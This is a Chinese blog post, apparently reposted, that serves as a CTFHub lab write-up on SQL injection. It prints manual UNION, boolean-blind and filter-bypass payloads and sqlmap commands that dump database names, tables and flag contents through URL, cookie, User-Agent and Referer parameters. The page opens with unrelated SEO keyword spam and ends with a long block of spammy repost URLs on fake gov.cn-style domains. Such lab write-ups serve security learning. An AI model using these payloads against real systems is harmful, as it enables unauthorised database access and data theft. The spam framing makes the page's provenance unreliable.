网站建设进展情况汇报,无锡企业网站制作策划,手机网站建设资讯,北京品牌建设网站sql学的太不好了#xff0c;回炉重造
判断 Sql 注入漏洞的类型#xff1a; 1.数字型 当输入的参 x 为整型时#xff0c;通常 abc.php 中 Sql 语句类型大致如下#xff1a;select * from 表名 where id x这种类型可以使用经典的 and 11 和 and 12 来判断#xff…sql学的太不好了回炉重造
判断 Sql 注入漏洞的类型 1.数字型 当输入的参 x 为整型时通常 abc.php 中 Sql 语句类型大致如下select * from 表名 where id x这种类型可以使用经典的 and 11 和 and 12 来判断 Url 地址中输入 http://xxx/abc.php?id x and 11 页面依旧运行正常继续进行下一步。 Url 地址中继续输入 http://xxx/abc.php?id x and 12 页面运行错误则说明此 Sql 注入为数字型注入。 2.字符型 当输入的参 x 为字符型时通常 abc.php 中 SQL 语句类型大致如下select * from 表名 where id x这种类型我们同样可以使用 and ‘1’1 和 and ‘1’2来判断 1.Url 地址中输入 http://xxx/abc.php?id x and 11 页面运行正常继续进行下一步。 2.Url 地址中继续输入 http://xxx/abc.php?id x and 12 页面运行错误则说明此 Sql 注入为字符型注入。 order by判断列数 SQL的Order By语句的详细介绍-51CTO.COM ORDER BY语句是SQL中非常重要的一个关键字它可以让我们对查询结果进行排序让结果更有意义和可读性。我们可以使用列名、列位置和表达式来指定排序的依据并且可以按照升序或降序进行排序。同时我们也可以指定多个排序依据以及按照不同的优先级进行排序。 sql语句闭合 https://www.cnblogs.com/cainiao-chuanqi/p/13543280.html 重要函数 group_concat()函数 GROUP_CONCAT(xxx)是将分组中括号里对应的字符串进行连接.如果分组中括号里 的参数xxx有多行那么就会将这多行的字符串连接每个字符串之间会有特定的符号进行分隔。 GROUP_CONCAT()是MySQL数据库提供的一个聚合函数用于将分组后的数据按照指定的顺序进行字符串拼接。它可以将多行数据合并成一个字符串并可选地添加分隔符。 information_schema information_schema 数据库跟 performance_schema 一样都是 MySQL 自带的信息数据库。其中 performance_schema 用于性能分析而 information_schema 用于存储数据库元数据(关于数据的数据)例如数据库名、表名、列的数据类型、访问权限等。 ctfhub
整数型注入 题目已经说了是整数型注入: ?id1 and 11,有回显 ?id1 and 12无回显说明有注入点判断列数 ?id-1 union select 3,database()查当前数据库 -1 union select 3,group_concat(table_name) from information_schema.tables where table_schemasqli 查表 ?id-1 union select 1,group_concat(column_name) from information_schema.columns where table_schemasqli and table_nameflag 查列 ?id-1 union select 1,group_concat(flag) from sqli.flag查字段内容 字符型注入当输入参数为字符串时称为字符型。数字型与字符型注入最大的区别在于数字型不需要单引号闭合而字符串类型一般要使用单引号来闭合。
字符型注入
手注
判断注入类型 ?id1and 11 ?id1and 12 判断列数 两列 判断回显位-1 union select 1,2#
-1 union select 1,database()# 查列名
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase()# 查字段名
-1 union select 1,group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameflag# 查字段内容-1 union select 1,(select flag from flag)# sqlmap注入
查库
sqlmap -u http://challenge-ffb571fa92ddc58a.sandbox.ctfhub.com:10800/?id --dbs -batch 查表
sqlmap -u http://challenge-ffb571fa92ddc58a.sandbox.ctfhub.com:10800/?id -D sqli --tables 查字段
sqlmap -u http://challenge-ffb571fa92ddc58a.sandbox.ctfhub.com:10800/?id -D sqli -T flag --columns 查字段内容
sqlmap -u http://challenge-ffb571fa92ddc58a.sandbox.ctfhub.com:10800/?id -D sqli -T flag -C flag --dump 布尔盲注 布尔类型Boolean type) 布尔类型只有两个值True 和 False。通常用来判断条件是否成立。计算机里的一种数据类型一般用于逻辑运算和比较运算。 盲注 盲注是指在SQL注入过程中SQL语句执行的选择后选择的数据不能回显到前端页面。此时我们需要利用一些方法进行判断或者尝试这个过程称之为盲注。 web页面返回True 或者 false构造SQL语句利用andornot等关键字 手注
判断当前数据库名的长度
1 and length(database())4 匹配数据库名的ASCII码把数据库名的各个字符分别与ASCII码匹配每一次匹配都要跑一次ASCII表 1 and ascii(substr(database(),1,1))115 1 and ascii(substr(database(),2,1))113 ... #数据库是security这里直接给了true值 1 and (select count(table_name) from information_schema.tables where table_schemasqli)2 #sqli下共是4个表直接给了true值 匹配表名的ASCII码 1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemasqli limit 0,1),1,1))102 1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemasqli limit 0,1),2,1))108 ... #sqli第一个表名是flag直接给了true值 判断字段列数 1 and (select count(column_name) from information_schema.columns where table_schemasqli and table_nameflag)1 #flag下有1个字段直接给了true值 sqlmap注入
sqlmap -u http://challenge-cf644ed065cdf2b6.sandbox.ctfhub.com:10800/?id --dbs
爆库 爆的很慢
sqlmap -u http://challenge-cf644ed065cdf2b6.sandbox.ctfhub.com:10800/?id -D sqli --tables
爆表 sqlmap -u http://challenge-cf644ed065cdf2b6.sandbox.ctfhub.com:10800/?id1 -D sqli -T flag --columns
爆字段 爆字段内容得到flag跑的太慢了 时间盲注
手注的话基本没方法都是用脚本或者sqlmap还有bp
cthub——时间盲注_ctfhub时间盲注_陈艺秋的博客-CSDN博客 直接就是sqlmap
爆库
qlmap -u http://challenge-906275b443b4d29f.sandbox.ctfhub.com:10800/?id1 -dbs 爆表
sqlmap -u http://challenge-906275b443b4d29f.sandbox.ctfhub.com:10800/?id1 -D sqli --tables 爆字段
sqlmap -u http://challenge-906275b443b4d29f.sandbox.ctfhub.com:10800/?id1 -D sqli -T flag --columns 爆字段内容得到flag
sqlmap -u http://challenge-906275b443b4d29f.sandbox.ctfhub.com:10800/?id1 -D sqli -T flag -C flag --dump MySQL结构
还是sqlmap
sqlmap -u http://challenge-2c5d583ef1948dfb.sandbox.ctfhub.com:10800/?id1 --dbs sqlmap -u http://challenge-2c5d583ef1948dfb.sandbox.ctfhub.com:10800/?id1 -D sqli --tables sqlmap -u http://challenge-2c5d583ef1948dfb.sandbox.ctfhub.com:10800/?id1 -D sqli -T xmujvhnaol --columns sqlmap -u http://challenge-2c5d583ef1948dfb.sandbox.ctfhub.com:10800/?id1 -D sqli -T xmujvhnaol -C uzufsfbkmh --dump Cookie注入
sqlmap
爆表
sqlmap -u http://challenge-0f62f6a78be96bdf.sandbox.ctfhub.com:10800/ --cookie id1 --level2 --dbs sqlmap -u http://challenge-0f62f6a78be96bdf.sandbox.ctfhub.com:10800/ --cookie id1 --level2 -D sqli --tables sqlmap -u http://challenge-0f62f6a78be96bdf.sandbox.ctfhub.com:10800/ --cookie id1 --level2 -D sqli -T nstjjcciab --columns
sqlmap -u http://challenge-0f62f6a78be96bdf.sandbox.ctfhub.com:10800/ --cookie id1 --level2 -D sqli -T nstjjcciab -C modgbjjxvs --dump UA注入 CTFHub - UA注入-CSDN博客
有三种方式一种是bp抓包注入一种是sqlmap一种是跑脚本
sqlmap -u http://challenge-bee10d452749b19f.sandbox.ctfhub.com:10800/ --level3 --dbs sqlmap -u http://challenge-bee10d452749b19f.sandbox.ctfhub.com:10800/ --level3 -D sqli --tables sqlmap -u http://challenge-bee10d452749b19f.sandbox.ctfhub.com:10800/ --level3 -D sqli -T nirrlnzyau --columns sqlmap -u http://challenge-bee10d452749b19f.sandbox.ctfhub.com:10800/ --level3 -D sqli -T nirrlnzyau -C ifvkcqvwxo --dump Refer注入
CTFHub - Refer注入_ctfhubrefer注入_CS_Nevvbie的博客-CSDN博客
Referer: 0 union select 1,database() Referer: 0 union select 1,group_concat(table_name) from information_schema.tables where table_schemasqli Referer: 0 union select 1,group_concat(column_name) from information_schema.columns where table_schemasqli and table_nameefdlqtawmh Referer: 0 union select 1,group_concat(onnawcxyvb) from sqli.efdlqtawmh 空格过滤
常用绕过空格过滤的方法
/**/、()、%0a
?id1/**/and/**/11 ?id1/**/and/**/12报错了确定是数字型注入 看回显位 查列数 发现到3没有回显了一共两列
开始注入
查库?id-1/**/union/**/select/**/1,database()
得到库名sqli ?id-1/**/union/**/select/**/group_concat(table_name),2/**/from/**/information_schema.tables/**/where/**/table_schemasqli 查表 查字段?id-1/**/union/**/select/**/group_concat(column_name),2/**/from/**/information_schema.columns/**/where/**/table_namelyispybtyt 查字段内容 得到flag 文章转载自: http://www.morning.lmfxq.cn.gov.cn.lmfxq.cn http://www.morning.bswxt.cn.gov.cn.bswxt.cn http://www.morning.djbhz.cn.gov.cn.djbhz.cn http://www.morning.tckxl.cn.gov.cn.tckxl.cn http://www.morning.ngzkt.cn.gov.cn.ngzkt.cn http://www.morning.rlhh.cn.gov.cn.rlhh.cn http://www.morning.pltbd.cn.gov.cn.pltbd.cn http://www.morning.hnrdtz.com.gov.cn.hnrdtz.com http://www.morning.csjps.cn.gov.cn.csjps.cn http://www.morning.wzknt.cn.gov.cn.wzknt.cn http://www.morning.lmmh.cn.gov.cn.lmmh.cn http://www.morning.kyctc.cn.gov.cn.kyctc.cn http://www.morning.njstzsh.com.gov.cn.njstzsh.com http://www.morning.hjwzpt.com.gov.cn.hjwzpt.com http://www.morning.zxznh.cn.gov.cn.zxznh.cn http://www.morning.mnqz.cn.gov.cn.mnqz.cn http://www.morning.bhwz.cn.gov.cn.bhwz.cn http://www.morning.bwkhp.cn.gov.cn.bwkhp.cn http://www.morning.rpgdd.cn.gov.cn.rpgdd.cn http://www.morning.c7495.cn.gov.cn.c7495.cn http://www.morning.fyglr.cn.gov.cn.fyglr.cn http://www.morning.djpps.cn.gov.cn.djpps.cn http://www.morning.zcqtr.cn.gov.cn.zcqtr.cn http://www.morning.bpcf.cn.gov.cn.bpcf.cn http://www.morning.ybqlb.cn.gov.cn.ybqlb.cn http://www.morning.dwxqf.cn.gov.cn.dwxqf.cn http://www.morning.zmpqh.cn.gov.cn.zmpqh.cn http://www.morning.brcdf.cn.gov.cn.brcdf.cn http://www.morning.rfyk.cn.gov.cn.rfyk.cn http://www.morning.sqfnx.cn.gov.cn.sqfnx.cn http://www.morning.zcwzl.cn.gov.cn.zcwzl.cn http://www.morning.ctpfq.cn.gov.cn.ctpfq.cn http://www.morning.xlyt.cn.gov.cn.xlyt.cn http://www.morning.rfwgg.cn.gov.cn.rfwgg.cn http://www.morning.mbhdl.cn.gov.cn.mbhdl.cn http://www.morning.nrxsl.cn.gov.cn.nrxsl.cn http://www.morning.lkxzb.cn.gov.cn.lkxzb.cn http://www.morning.bpmdg.cn.gov.cn.bpmdg.cn http://www.morning.zzaxr.cn.gov.cn.zzaxr.cn http://www.morning.zmpsl.cn.gov.cn.zmpsl.cn http://www.morning.htbsk.cn.gov.cn.htbsk.cn http://www.morning.pwmpn.cn.gov.cn.pwmpn.cn http://www.morning.mrbzq.cn.gov.cn.mrbzq.cn http://www.morning.pndhh.cn.gov.cn.pndhh.cn http://www.morning.rdgb.cn.gov.cn.rdgb.cn http://www.morning.yqkxr.cn.gov.cn.yqkxr.cn http://www.morning.kaoshou.net.gov.cn.kaoshou.net http://www.morning.xmttd.cn.gov.cn.xmttd.cn http://www.morning.hybmz.cn.gov.cn.hybmz.cn http://www.morning.hzryl.cn.gov.cn.hzryl.cn http://www.morning.wptdg.cn.gov.cn.wptdg.cn http://www.morning.drwpn.cn.gov.cn.drwpn.cn http://www.morning.srbfp.cn.gov.cn.srbfp.cn http://www.morning.bmmhs.cn.gov.cn.bmmhs.cn http://www.morning.phnbd.cn.gov.cn.phnbd.cn http://www.morning.xkjrq.cn.gov.cn.xkjrq.cn http://www.morning.zqybs.cn.gov.cn.zqybs.cn http://www.morning.dndjx.cn.gov.cn.dndjx.cn http://www.morning.nbqwr.cn.gov.cn.nbqwr.cn http://www.morning.kynf.cn.gov.cn.kynf.cn http://www.morning.gbhsz.cn.gov.cn.gbhsz.cn http://www.morning.pwbps.cn.gov.cn.pwbps.cn http://www.morning.llfwg.cn.gov.cn.llfwg.cn http://www.morning.kwksj.cn.gov.cn.kwksj.cn http://www.morning.xsgxp.cn.gov.cn.xsgxp.cn http://www.morning.ffdyy.cn.gov.cn.ffdyy.cn http://www.morning.wkqrp.cn.gov.cn.wkqrp.cn http://www.morning.bpknt.cn.gov.cn.bpknt.cn http://www.morning.zxhpx.cn.gov.cn.zxhpx.cn http://www.morning.yjmns.cn.gov.cn.yjmns.cn http://www.morning.fmqw.cn.gov.cn.fmqw.cn http://www.morning.ryywf.cn.gov.cn.ryywf.cn http://www.morning.plwfx.cn.gov.cn.plwfx.cn http://www.morning.lsjgh.cn.gov.cn.lsjgh.cn http://www.morning.hnkkm.cn.gov.cn.hnkkm.cn http://www.morning.xdmsq.cn.gov.cn.xdmsq.cn http://www.morning.hcgbm.cn.gov.cn.hcgbm.cn http://www.morning.zdfrg.cn.gov.cn.zdfrg.cn http://www.morning.hhpkb.cn.gov.cn.hhpkb.cn http://www.morning.plcyq.cn.gov.cn.plcyq.cn
